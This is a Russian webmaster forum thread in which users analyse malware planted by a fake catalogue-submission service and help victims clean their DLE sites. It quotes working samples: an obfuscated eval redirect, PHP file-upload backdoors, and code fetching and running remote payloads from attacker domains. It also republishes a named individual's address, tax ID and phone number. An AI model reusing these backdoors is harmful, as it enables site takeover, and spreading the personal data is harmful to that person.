mrak7575

история как cataloguing.ru убил мой сайт

49 posts in this topic

Тема очень интересна.
Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

Сайт на dle.
gameprocs.ru

Как я понял у меня тоже шел?
Где его искать?

Share this post


Link to post
Share on other sites

Тема очень интересна.

Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

 

Сайт на dle.

gameprocs.ru

 

Как я понял у меня тоже шел?

Где его искать?

Все же разжевали! Если надо ткнкуть пальцем, то во всех js файлах (в самом конце) у вас внедрен редирект:

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
Riminy likes this

Share this post


Link to post
Share on other sites

 

Все же разжевали! Если надо ткнкуть пальцем, то во всех js файлах (в самом конце) у вас внедрен редирект:

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

Спасибо больше ребята.

Share this post


Link to post
Share on other sites

Спасибо больше ребята.

Ну и про index.php вы поняли? В нем будет строчка:

<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>

Уже ее удаляйте, пока вам не залили шел (а возможно и уже залили)

Share this post


Link to post
Share on other sites

Тема очень интересна.

Ребят пару месяцев назад так же увидел данную халяву. Решил прогнать свой сайтик.

 

Сайт на dle.

gameprocs.ru

 

Как я понял у меня тоже шел?

Где его искать?

Ваш сайт инфицирован. Ткнул в первую попавшуюся js-ку "dle_js.js" - нашёл вредоносный код в конце. Тот же самый редирект на "http://02o.org/1a".

Код внедряется только в скрипты более 2000 символов, маленькие не трогает.

Прогоните из шелла (putty) команду, что я писал выше, получите список зараженных файлов.

Проверьте index.php, самое начало, там самая бяка может сидеть ("<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>")

Удалите 1.php, если он есть.

Посмотрите по access.log, были ли вызовы /index.php по методу POST.

Рекомендую ПОЛНОЕ восстановление из бекапа, так как, по-видимому, у вас давно заражение было, могли назаливать чего угодно.

Share this post


Link to post
Share on other sites

Да, ещё один важный момент. Функция, которая обходит и заражает скрипты, умеет подниматься выше уровня каталога с сайтом. Вобщем, заразит всё, куда дотянется пользователь, от которого запущен веб-сервер. Так что если рядом лежали ещё сайты, их тоже надо проверить.

Share this post


Link to post
Share on other sites

Приду с работы начну пилить.

Бэкап не сохранил, сайта.

 

Теперь буду делать бэки.

Share this post


Link to post
Share on other sites

Видел реплику в тему: Люди делятся на два типа, кто не делает бэкапы, и кто уже делает.

Share this post


Link to post
Share on other sites

Тут рекламируют этот сайт.

http://pr-cy.ru/qa/question/28201

 

Можно добавить, наверное, фильтр в сообщения по доменному имени, а то не первый раз вижу "доброжелателей", рекламирующих этот "сервис".

puritan likes this

Share this post


Link to post
Share on other sites
Сергей Spbmuz  PRO

Зарегистрирован 12.04.16 15:08     Был сегодня в 14:08   А так можно ???

Share this post


Link to post
Share on other sites

Приду с работы начну пилить.

Бэкап не сохранил, сайта.

 

Теперь буду делать бэки.

Наверное, самый простой способ почистить эту дрянь - это воспользоваться функцией "Найти в файлах" в notepad++ (Поиск --> Найти в файлах).

Share this post


Link to post
Share on other sites

Всем спасибо ребят вро де бы почистил.

Буду смотреть дальше.

Share this post


Link to post
Share on other sites

Отличная тема, всем +, Клиент попался на данную тему, попросил исправить, и даже рыть не пришлось ничего, поиск Яндекса и рубль в кармане.

Share this post


Link to post
Share on other sites

Ребятушки помогите пожалуйста, почистил все как написано,  но не помогло(((

Где еще может сидеть эта гадость? 

Share this post


Link to post
Share on other sites

Ребятушки помогите пожалуйста, почистил все как написано,  но не помогло(((

Где еще может сидеть эта гадость? 

Ну как где? В файлах на вашем сайте. Больше нигде.

А учитывая заливку шеллов и еще чего, стоит проверить и бд

workmaster95 likes this

Share this post


Link to post
Share on other sites

Прогон по каталогам переехал на другой домен - "seo-razgon.ru"

 

domain: SEO-RAZGON.RU
nserver: ns1.servercount.com.
nserver: ns2.servercount.com.
nserver: ns3.servercount.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-RU
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2016.11.28
paid-till: 2017.11.28
free-date: 2017.12.29
source: TCI

 

В 1.php изменился только этот адрес, по ссылкам с work.txt теперь в браузер ничего не отдаёт, так что хз, живо оно там или нет.

Может на досуге соберу honeypot и погляжу по подробнее...

Riminy likes this

Share this post


Link to post
Share on other sites

Прогон по каталогам переехал на другой домен - "seo-razgon.ru"

 

domain: SEO-RAZGON.RU

nserver: ns1.servercount.com.

nserver: ns2.servercount.com.

nserver: ns3.servercount.com.

state: REGISTERED, DELEGATED, VERIFIED

person: Private Person

registrar: REGRU-RU

admin-contact: http://www.reg.ru/whois/admin_contact

created: 2016.11.28

paid-till: 2017.11.28

free-date: 2017.12.29

source: TCI

 

В 1.php изменился только этот адрес, по ссылкам с work.txt теперь в браузер ничего не отдаёт, так что хз, живо оно там или нет.

Может на досуге соберу honeypot и погляжу по подробнее...

 

Спасибо за бдительность, новичкам будет полезно, я как-то раз попадался на подобную ловушку.


Отзывы о работе SEO-RAZGON.RU - вирус, убил сайт, как исправить.

Share this post


Link to post
Share on other sites

pitcher.su - оно или нет, интересно. Тексты сайта похожие на предыдущие, механизм поменялся. К сожалению, нет времени разобраться подробно. 

по данным WHOIS.TCINET.RU:
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        PITCHER.SU
nserver:       ns1.hosting-vip.biz.
nserver:       ns2.hosting-vip.biz.
nserver:       ns3.hosting-vip.biz.
nserver:       ns4.hosting-vip.biz.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        has@mail.ru
registrar:     REGRU-SU
created:       2017-02-06T13:17:38Z
paid-till:     2019-02-06T13:17:39Z
free-date:     2019-03-11
source:        TCI

Last updated on 2018-02-20T10:36:34Z 

 

Share this post


Link to post
Share on other sites

А, разобрался. Да, это оно опять ожило :) Там при копировании кода с сайта скрипт подсовывает другой код :)

Нам кажется, что копируем

<a href="<?php if(isset($_GET['link'])) echo($_GET['link']); ?>">ОБРАТНАЯ ССЫЛКА</a>

А на самом деле, копируется это:

<a href="<?php if(isset($_GET['link'])) echo(eval($_GET['link'])); ?>">ОБРАТНАЯ ССЫЛКА</a>

Разница - как обычно - в функции eval();

Так что да, это опять каталогинг воскрес. В топку его :)

Share this post


Link to post
Share on other sites
6 минут назад, cyber сказал:

А, разобрался. Да, это оно опять ожило :) Там при копировании кода с сайта скрипт подсовывает другой код :)

Нам кажется, что копируем


<a href="<?php if(isset($_GET['link'])) echo($_GET['link']); ?>">ОБРАТНАЯ ССЫЛКА</a>

А на самом деле, копируется это:


<a href="<?php if(isset($_GET['link'])) echo(eval($_GET['link'])); ?>">ОБРАТНАЯ ССЫЛКА</a>

Разница - как обычно - в функции eval();

Так что да, это опять каталогинг воскрес. В топку его :)

Год и один день!

Share this post


Link to post
Share on other sites

Да, я с тех пор зол на них и периодически проверяю обстановку :D

Тут ещё один интересный момент: если внимательно глянуть в whois домена, то там есть мыльце has@mail.ru

Поискал - нашёл вот это: http://zakupki.gov.ru/epz/contract/contractCard/common-info.html?reestrNumber=2211300063016000059

Цитата
БЕЛОВ НИКОЛАЙ ВАСИЛЬЕВИЧ
Индивидуальный предприниматель
ИНН: 212700226591
КПП, дата постановки на учет:
21.09.1995
Российская Федерация
643
428022, ЧУВАШИЯ ЧУВАШСКАЯ РЕСПУБЛИКА- 21, Г ЧЕБОКСАРЫ, УЛ КОСМОНАВТА НИКОЛАЕВА А.Г., 26, 75 428022, ЧУВАШИЯ ЧУВАШСКАЯ РЕСПУБЛИКА- 21, Г ЧЕБОКСАРЫ, УЛ КОСМОНАВТА НИКОЛАЕВА А.Г., 26, 75
97701000
7-906-386754
has@mail.ru
 

Кто-нибудь знает, обязательно ли подтверждать почту для whois? Или можно левак вбить?

Share this post


Link to post
Share on other sites

По pitcher.ru:

Лог запроса на 1.php (ip их оставил):

46.30.40.107 - - [02/Oct/2018:17:36:32 +0300] "GET /1.php?link=eval(file_get_contents("http://pitcher.su/w/")); HTTP/1.1" 200 32 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51" 864955 73333:163333

Моментально привозит в ваш index.php следующий код (дальше не ждал, снёс 1.php, восстановился из бекапа):

<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
<------>move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
<------>eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}

Строка в base64 - http://qb0.ru/w/?u= - отдает такой код:

if(!isset($_GET['cmdcmd']))
{
header('Content-type: text/html; charset=UTF-8');
echo '<!DOCTYPE html>
<html>
<head>
<script>
if((self.parent && !(self.parent===self)) && (self.parent.frames.length!=0)){self.parent.location=document.location};
window.location.href="http://torroid.ru";
</script>
</head>
<body>
</body>
</html>';
exit;
}

Из браузера без параметров попадаем на....

http://torroid.ru

Свежий прогон по каталогам.

domain: TORROID.RU
nserver: ns1.hosting-vip.biz.
nserver: ns2.hosting-vip.biz.
nserver: ns3.hosting-vip.biz.
nserver: ns4.hosting-vip.biz.
state: REGISTERED, DELEGATED
person: Private Person
registrar: REGRU-RU
admin-contact: https://www.reg.ru/whois/admin_contact
created: 2018.08.03
paid-till: 2019.08.03
free-date: 2019.09.03
source: REGRU-RU

Ещё "сервисы" от этих жуликов:

http://mailer.qb0.ru/

http://ml.m8d.pw/

Ковырять насквозь всё это добро нету времени, везде присутствует развод на бабки и сомнительный код.

Цитата

Теги: pitcher.su torroid.ru mailer.qb0.ru ml.m8d.pw - развод на бабки лохотрон вирус заразил сайт гроб гроб кладбище пидор

 

Share this post


Link to post
Share on other sites

Вдогонку: во вредоносном коде index.php есть хэш md5 (3ff1ea09b981d88e7c8752b329a7702e), который соответствует строке "loh" :)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.